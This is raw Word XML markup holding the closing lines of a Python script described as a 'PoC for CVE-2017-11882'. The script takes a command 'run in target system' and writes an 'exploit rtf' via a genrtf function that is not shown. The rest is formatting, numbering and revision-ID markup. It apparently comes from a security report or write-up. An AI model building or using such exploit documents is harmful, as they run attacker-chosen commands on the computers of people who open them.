    <w:p w14:paraId="51C4BDDD" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">    parser = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>argparse.ArgumentParser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>(description="PoC for CVE-2017-11882")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B4A5B3" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>parser.add_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>argument</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>"-c", "--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>", help="Command run in target system", required=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44457268" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>parser.add_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>argument</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>'-o', "--output", help="Output exploit rtf", required=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3742EA55" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>parser.add_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>argument</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>"-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>", "--input", help="Input normal rtf.", required=False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D247D99" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BF30B56" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>parser.parse</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>_args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560690EC" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">    if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>args.input</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve"> != None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F28DCB" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>r_header</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>getrheader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>args.input</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78367956" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD9DB37" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>r_header</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve"> = head</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBBBA4D" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38E6F656" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">    with open(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>args.output</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>,'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>wb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F851D55" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>f.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>genrtf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>args.cmd,r_header</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C3026D" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>f.close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5440BA15" w14:textId="77777777" w:rsidR="00277FB0" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="00277FB0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BF610F0" w14:textId="3664D75A" w:rsidR="00B45BC8" w:rsidRPr="00277FB0" w:rsidRDefault="00277FB0" w:rsidP="005B15C4">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve">    print "[*] </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>Done !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve"> output file --&gt; " + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t>args.output</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277FB0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B45BC8" w:rsidRPr="00277FB0" w:rsidSect="00D60F7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CFB7" w14:textId="77777777" w:rsidR="00B15032" w:rsidRPr="00D60F71" w:rsidRDefault="00B1503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4D1E7F2" w14:textId="77777777" w:rsidR="00B15032" w:rsidRPr="00D60F71" w:rsidRDefault="00B1503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0165" w14:textId="77777777" w:rsidR="00B878D9" w:rsidRDefault="00B878D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057D2AF" w14:textId="77777777" w:rsidR="00B878D9" w:rsidRPr="00C53ADA" w:rsidRDefault="00B878D9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B70D74">
          <w:rPr>
            <w:noProof/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>5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4995" w14:textId="77777777" w:rsidR="00B878D9" w:rsidRDefault="00B878D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1F4E" w14:textId="77777777" w:rsidR="00B15032" w:rsidRPr="00D60F71" w:rsidRDefault="00B1503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45D8133" w14:textId="77777777" w:rsidR="00B15032" w:rsidRPr="00D60F71" w:rsidRDefault="00B1503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0E7" w14:textId="77777777" w:rsidR="00B878D9" w:rsidRDefault="00B878D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0594" w14:textId="77777777" w:rsidR="00B878D9" w:rsidRDefault="00B878D9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8AA1" w14:textId="77777777" w:rsidR="00B878D9" w:rsidRDefault="00B878D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AFF2F24"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D8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27C09"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="547C75F6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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5B8C420F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BC7A181E"/>
    <w:lvl w:ilvl="0" w:tplc="3934D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046283"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="18942E16"/>
    <w:lvl w:ilvl="0" w:tplc="835C0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28981696">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1963270162">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2114549737">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1562057923">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="997997561">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="540825812">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="849679776">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="605773987">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1152482912">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="191692891">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="670764819">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="104689483">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1691835547">
    <w:abstractNumId w:val="11"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="8350192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159177">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1141965212">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1692947503">
    <w:abstractNumId w:val="11"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1886527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4038477">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="63719406">
    <w:abstractNumId w:val="11"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="743726659">
    <w:abstractNumId w:val="11"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="681400469">
    <w:abstractNumId w:val="11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01584"/>
    <w:rsid w:val="000023B5"/>
    <w:rsid w:val="00007A2B"/>
    <w:rsid w:val="00011493"/>
    <w:rsid w:val="00011CC5"/>
    <w:rsid w:val="00014AF3"/>
    <w:rsid w:val="00014C23"/>
    <w:rsid w:val="000230E0"/>
    <w:rsid w:val="0002448B"/>
    <w:rsid w:val="00035C4C"/>
    <w:rsid w:val="0003656F"/>
    <w:rsid w:val="0005086B"/>
    <w:rsid w:val="00053892"/>
    <w:rsid w:val="00054929"/>
    <w:rsid w:val="0005507F"/>
    <w:rsid w:val="00055100"/>
    <w:rsid w:val="0006172D"/>
    <w:rsid w:val="00063A15"/>
    <w:rsid w:val="0006527A"/>
    <w:rsid w:val="00074239"/>
    <w:rsid w:val="000774F2"/>
    <w:rsid w:val="000808B2"/>
    <w:rsid w:val="0008222C"/>
    <w:rsid w:val="00086154"/>
    <w:rsid w:val="000876DD"/>
    <w:rsid w:val="00090579"/>
    <w:rsid w:val="0009539E"/>
    <w:rsid w:val="00095910"/>
    <w:rsid w:val="0009614A"/>
    <w:rsid w:val="000B1F41"/>
    <w:rsid w:val="000B5D9C"/>
    <w:rsid w:val="000B6B6A"/>
    <w:rsid w:val="000B7B38"/>
    <w:rsid w:val="000C06B6"/>
    <w:rsid w:val="000C4F35"/>
    <w:rsid w:val="000C579D"/>
    <w:rsid w:val="000D31FB"/>
    <w:rsid w:val="000D5576"/>
    <w:rsid w:val="000D78FE"/>
    <w:rsid w:val="000F0813"/>
    <w:rsid w:val="000F41FA"/>
    <w:rsid w:val="000F5B25"/>
    <w:rsid w:val="000F6298"/>
    <w:rsid w:val="000F71FD"/>
    <w:rsid w:val="0010012D"/>
    <w:rsid w:val="00105056"/>
    <w:rsid w:val="00107FE0"/>
    <w:rsid w:val="00120E8C"/>
    <w:rsid w:val="001250A1"/>
    <w:rsid w:val="001266F4"/>
    <w:rsid w:val="00132AA2"/>
    <w:rsid w:val="00136D7A"/>
    <w:rsid w:val="001403FF"/>
    <w:rsid w:val="00142CC2"/>
    <w:rsid w:val="0014770C"/>
    <w:rsid w:val="00151BEC"/>
    <w:rsid w:val="00152A40"/>
    <w:rsid w:val="0015404F"/>
    <w:rsid w:val="00155139"/>
    <w:rsid w:val="0015543A"/>
    <w:rsid w:val="001554BB"/>
    <w:rsid w:val="00156E11"/>
    <w:rsid w:val="00160D17"/>
    <w:rsid w:val="00161437"/>
    <w:rsid w:val="0016164A"/>
    <w:rsid w:val="00162375"/>
    <w:rsid w:val="00164D4C"/>
    <w:rsid w:val="0016557E"/>
    <w:rsid w:val="00181AB2"/>
    <w:rsid w:val="001832F5"/>
    <w:rsid w:val="001840E9"/>
    <w:rsid w:val="00184FFC"/>
    <w:rsid w:val="001920E0"/>
    <w:rsid w:val="00196072"/>
    <w:rsid w:val="0019733A"/>
    <w:rsid w:val="00197809"/>
    <w:rsid w:val="001A0454"/>
    <w:rsid w:val="001A1ADF"/>
    <w:rsid w:val="001B1B03"/>
    <w:rsid w:val="001B1DDF"/>
    <w:rsid w:val="001B32F7"/>
    <w:rsid w:val="001B3600"/>
    <w:rsid w:val="001C3AAE"/>
    <w:rsid w:val="001C731B"/>
    <w:rsid w:val="001D232A"/>
    <w:rsid w:val="001D3D8C"/>
    <w:rsid w:val="001D5471"/>
    <w:rsid w:val="001E6E38"/>
    <w:rsid w:val="001F1EB9"/>
    <w:rsid w:val="001F44F2"/>
    <w:rsid w:val="0020070E"/>
    <w:rsid w:val="00203913"/>
    <w:rsid w:val="00203E5A"/>
    <w:rsid w:val="002046ED"/>
    <w:rsid w:val="002235B3"/>
    <w:rsid w:val="00230843"/>
    <w:rsid w:val="00234281"/>
    <w:rsid w:val="00236562"/>
    <w:rsid w:val="0024726E"/>
    <w:rsid w:val="002506E0"/>
    <w:rsid w:val="002523D2"/>
    <w:rsid w:val="0025334A"/>
    <w:rsid w:val="00262103"/>
    <w:rsid w:val="00262E89"/>
    <w:rsid w:val="00263E76"/>
    <w:rsid w:val="0027001F"/>
    <w:rsid w:val="00272818"/>
    <w:rsid w:val="00276188"/>
    <w:rsid w:val="00277FB0"/>
    <w:rsid w:val="00280A0E"/>
    <w:rsid w:val="00281518"/>
    <w:rsid w:val="002854AE"/>
    <w:rsid w:val="00286A7D"/>
    <w:rsid w:val="00287A1C"/>
    <w:rsid w:val="002949E5"/>
    <w:rsid w:val="00295B34"/>
    <w:rsid w:val="00296514"/>
    <w:rsid w:val="0029799E"/>
    <w:rsid w:val="002B1631"/>
    <w:rsid w:val="002C42A4"/>
    <w:rsid w:val="002C4E42"/>
    <w:rsid w:val="002C68D4"/>
    <w:rsid w:val="002D1672"/>
    <w:rsid w:val="002D5C58"/>
    <w:rsid w:val="002E373A"/>
    <w:rsid w:val="002E41FE"/>
    <w:rsid w:val="002E4E67"/>
    <w:rsid w:val="002E7750"/>
    <w:rsid w:val="002F1E56"/>
    <w:rsid w:val="002F6E01"/>
    <w:rsid w:val="00301363"/>
    <w:rsid w:val="00305BA5"/>
    <w:rsid w:val="00312B77"/>
    <w:rsid w:val="00321776"/>
    <w:rsid w:val="00327A23"/>
    <w:rsid w:val="00337BC9"/>
    <w:rsid w:val="003409E1"/>
    <w:rsid w:val="00341A02"/>
    <w:rsid w:val="0034325A"/>
    <w:rsid w:val="00343B9C"/>
    <w:rsid w:val="00344AFD"/>
    <w:rsid w:val="00345B0C"/>
    <w:rsid w:val="0034765B"/>
    <w:rsid w:val="003516AF"/>
    <w:rsid w:val="00364A73"/>
    <w:rsid w:val="00367147"/>
    <w:rsid w:val="00367C22"/>
    <w:rsid w:val="00371E39"/>
    <w:rsid w:val="0037417C"/>
    <w:rsid w:val="00375B73"/>
    <w:rsid w:val="00376F99"/>
    <w:rsid w:val="003778FC"/>
    <w:rsid w:val="00384D04"/>
    <w:rsid w:val="00384DFF"/>
    <w:rsid w:val="00384ECC"/>
    <w:rsid w:val="00394AF0"/>
    <w:rsid w:val="00395E78"/>
    <w:rsid w:val="003A4912"/>
    <w:rsid w:val="003A6509"/>
    <w:rsid w:val="003B2153"/>
    <w:rsid w:val="003B7418"/>
    <w:rsid w:val="003C218B"/>
    <w:rsid w:val="003C5FC1"/>
    <w:rsid w:val="003C6140"/>
    <w:rsid w:val="003C73A6"/>
    <w:rsid w:val="003D414E"/>
    <w:rsid w:val="003D5D38"/>
    <w:rsid w:val="003E11CD"/>
    <w:rsid w:val="003E4132"/>
    <w:rsid w:val="003E4A5D"/>
    <w:rsid w:val="003E4C7B"/>
    <w:rsid w:val="003E6821"/>
    <w:rsid w:val="003F04A4"/>
    <w:rsid w:val="003F29C0"/>
    <w:rsid w:val="003F6689"/>
    <w:rsid w:val="003F7FD1"/>
    <w:rsid w:val="00400DFA"/>
    <w:rsid w:val="004017A6"/>
    <w:rsid w:val="00401C06"/>
    <w:rsid w:val="004023E2"/>
    <w:rsid w:val="0040671E"/>
    <w:rsid w:val="0040722F"/>
    <w:rsid w:val="004104A1"/>
    <w:rsid w:val="0041451B"/>
    <w:rsid w:val="004156CB"/>
    <w:rsid w:val="00417332"/>
    <w:rsid w:val="00423F4A"/>
    <w:rsid w:val="00424206"/>
    <w:rsid w:val="00427629"/>
    <w:rsid w:val="004329C7"/>
    <w:rsid w:val="00440633"/>
    <w:rsid w:val="004429A0"/>
    <w:rsid w:val="00444585"/>
    <w:rsid w:val="004529F9"/>
    <w:rsid w:val="004533BF"/>
    <w:rsid w:val="00453CBA"/>
    <w:rsid w:val="004557B6"/>
    <w:rsid w:val="004557D2"/>
    <w:rsid w:val="00462DFF"/>
    <w:rsid w:val="004662AF"/>
    <w:rsid w:val="004663D8"/>
    <w:rsid w:val="00466EF4"/>
    <w:rsid w:val="00471B58"/>
    <w:rsid w:val="004739D2"/>
    <w:rsid w:val="00474DE4"/>
    <w:rsid w:val="00475C3D"/>
    <w:rsid w:val="004831CF"/>
    <w:rsid w:val="00486562"/>
    <w:rsid w:val="00487BAD"/>
    <w:rsid w:val="00491AFF"/>
    <w:rsid w:val="004962B7"/>
    <w:rsid w:val="00497F6F"/>
    <w:rsid w:val="004A04FF"/>
    <w:rsid w:val="004A1B1D"/>
    <w:rsid w:val="004A204C"/>
    <w:rsid w:val="004B03E5"/>
    <w:rsid w:val="004B0556"/>
    <w:rsid w:val="004B37E8"/>
    <w:rsid w:val="004B51EF"/>
    <w:rsid w:val="004B5CD2"/>
    <w:rsid w:val="004B6806"/>
    <w:rsid w:val="004B6A2E"/>
    <w:rsid w:val="004B70CD"/>
    <w:rsid w:val="004C0B61"/>
    <w:rsid w:val="004D2FD3"/>
    <w:rsid w:val="004D4772"/>
    <w:rsid w:val="004D7D13"/>
    <w:rsid w:val="004E0058"/>
    <w:rsid w:val="004E3D1B"/>
    <w:rsid w:val="004E5ACF"/>
    <w:rsid w:val="004F2A89"/>
    <w:rsid w:val="004F7521"/>
    <w:rsid w:val="004F7F88"/>
    <w:rsid w:val="005023FD"/>
    <w:rsid w:val="00502C34"/>
    <w:rsid w:val="00503B11"/>
    <w:rsid w:val="00506064"/>
    <w:rsid w:val="00507045"/>
    <w:rsid w:val="005129FE"/>
    <w:rsid w:val="00512B9A"/>
    <w:rsid w:val="0051583C"/>
    <w:rsid w:val="00516DFF"/>
    <w:rsid w:val="00522848"/>
    <w:rsid w:val="0052673D"/>
    <w:rsid w:val="00526829"/>
    <w:rsid w:val="00526B94"/>
    <w:rsid w:val="00527FA7"/>
    <w:rsid w:val="00536D9A"/>
    <w:rsid w:val="00540257"/>
    <w:rsid w:val="0054124C"/>
    <w:rsid w:val="00541280"/>
    <w:rsid w:val="00543F39"/>
    <w:rsid w:val="00544F2D"/>
    <w:rsid w:val="00545DD4"/>
    <w:rsid w:val="00551067"/>
    <w:rsid w:val="00555F47"/>
    <w:rsid w:val="005562E3"/>
    <w:rsid w:val="0056345F"/>
    <w:rsid w:val="005657A3"/>
    <w:rsid w:val="005717B6"/>
    <w:rsid w:val="00571F9D"/>
    <w:rsid w:val="00573F44"/>
    <w:rsid w:val="00574C26"/>
    <w:rsid w:val="00574CB4"/>
    <w:rsid w:val="00582B26"/>
    <w:rsid w:val="005967FD"/>
    <w:rsid w:val="00596EAA"/>
    <w:rsid w:val="00597CF0"/>
    <w:rsid w:val="005A5B17"/>
    <w:rsid w:val="005A7589"/>
    <w:rsid w:val="005B15C4"/>
    <w:rsid w:val="005B34CA"/>
    <w:rsid w:val="005B5437"/>
    <w:rsid w:val="005C010F"/>
    <w:rsid w:val="005D14CD"/>
    <w:rsid w:val="005D2800"/>
    <w:rsid w:val="005D6D4C"/>
    <w:rsid w:val="005E09DD"/>
    <w:rsid w:val="005E2FA0"/>
    <w:rsid w:val="005E3E2F"/>
    <w:rsid w:val="005E4F2A"/>
    <w:rsid w:val="005F17E7"/>
    <w:rsid w:val="005F5D88"/>
    <w:rsid w:val="005F6259"/>
    <w:rsid w:val="00601F8B"/>
    <w:rsid w:val="00602143"/>
    <w:rsid w:val="00602E3C"/>
    <w:rsid w:val="0060365B"/>
    <w:rsid w:val="00604E30"/>
    <w:rsid w:val="006071EC"/>
    <w:rsid w:val="00607C78"/>
    <w:rsid w:val="006176B4"/>
    <w:rsid w:val="00620024"/>
    <w:rsid w:val="00620DD8"/>
    <w:rsid w:val="00622886"/>
    <w:rsid w:val="0062682D"/>
    <w:rsid w:val="00630DF3"/>
    <w:rsid w:val="006315D6"/>
    <w:rsid w:val="00631E25"/>
    <w:rsid w:val="0063610E"/>
    <w:rsid w:val="00641435"/>
    <w:rsid w:val="006450B7"/>
    <w:rsid w:val="006510DF"/>
    <w:rsid w:val="0065181A"/>
    <w:rsid w:val="00651950"/>
    <w:rsid w:val="00651D15"/>
    <w:rsid w:val="00652D2B"/>
    <w:rsid w:val="0065348E"/>
    <w:rsid w:val="00656C8A"/>
    <w:rsid w:val="0066013A"/>
    <w:rsid w:val="00663784"/>
    <w:rsid w:val="00667309"/>
    <w:rsid w:val="00672D7E"/>
    <w:rsid w:val="00674524"/>
    <w:rsid w:val="00676331"/>
    <w:rsid w:val="00676862"/>
    <w:rsid w:val="006826B9"/>
    <w:rsid w:val="00691E1B"/>
    <w:rsid w:val="006A13AA"/>
    <w:rsid w:val="006A296E"/>
    <w:rsid w:val="006A31FB"/>
    <w:rsid w:val="006A648D"/>
    <w:rsid w:val="006A6530"/>
    <w:rsid w:val="006B04BA"/>
    <w:rsid w:val="006B3E75"/>
    <w:rsid w:val="006B4CA3"/>
    <w:rsid w:val="006B5571"/>
    <w:rsid w:val="006B6772"/>
    <w:rsid w:val="006B68A0"/>
    <w:rsid w:val="006B6C66"/>
    <w:rsid w:val="006B7D17"/>
    <w:rsid w:val="006C0377"/>
    <w:rsid w:val="006C3D18"/>
    <w:rsid w:val="006C7A54"/>
    <w:rsid w:val="006D0C1E"/>
    <w:rsid w:val="006D0EEC"/>
    <w:rsid w:val="006D0F2A"/>
    <w:rsid w:val="006D23CF"/>
    <w:rsid w:val="006E24A7"/>
    <w:rsid w:val="006E2B77"/>
    <w:rsid w:val="006E4FEE"/>
    <w:rsid w:val="006E635A"/>
    <w:rsid w:val="006E694E"/>
    <w:rsid w:val="006E7B40"/>
    <w:rsid w:val="006F2E6B"/>
    <w:rsid w:val="006F2F01"/>
